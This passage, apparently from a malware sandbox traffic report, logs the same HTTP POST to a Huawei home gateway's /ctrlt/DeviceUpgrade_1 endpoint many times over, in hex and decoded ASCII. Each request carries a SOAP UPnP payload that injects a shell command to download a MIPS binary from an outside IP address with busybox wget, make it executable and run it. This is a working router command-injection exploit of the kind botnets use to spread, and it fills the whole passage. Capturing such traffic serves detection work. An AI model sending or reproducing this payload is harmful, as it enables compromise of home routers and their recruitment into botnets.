74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
